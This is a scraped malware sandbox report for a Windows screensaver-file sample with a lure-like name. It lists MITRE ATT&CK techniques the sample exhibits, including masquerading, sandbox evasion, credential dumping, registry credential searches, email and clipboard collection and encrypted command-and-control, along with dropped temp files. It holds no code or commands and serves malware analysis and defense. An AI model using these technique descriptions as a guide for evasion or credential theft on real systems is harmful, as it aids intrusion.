Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Buyeg.tmpdb

C:\Users\user\AppData\Local\Temp\Cocwtjozfrv.tmpdb

C:\Users\user\AppData\Local\Temp\Eiakizpyayx.tmpdb

C:\Users\user\AppData\Local\Temp\Eyyfpwdpwe.tmpdb

C:\Users\user\AppData\Local\Temp\Jalcxg.tmpdb

C:\Users\user\AppData\Local\Temp\Kcidab.tmpdb

C:\Users\user\AppData\Local\Temp\Mwcft.tmpdb

C:\Users\user\AppData\Local\Temp\Nqzztyyufmf.tmp

C:\Users\user\AppData\Local\Temp\Ntxfuk.tmpdb

C:\Users\user\AppData\Local\Temp\Oazzuwge.tmpdb

C:\Users\user\AppData\Local\Temp\Opnjh.tmpdb

C:\Users\user\AppData\Local\Temp\Owotczgukzq.tmpdb

C:\Users\user\AppData\Local\Temp\Pxmvdvdnhp.tmpdb

Windows Analysis Report
UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Function 004CE8E0 Relevance: 7.2, Strings: 5, Instructions: 983
COMMON

Function 01F10040 Relevance: 3.6, Strings: 2, Instructions: 1081
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre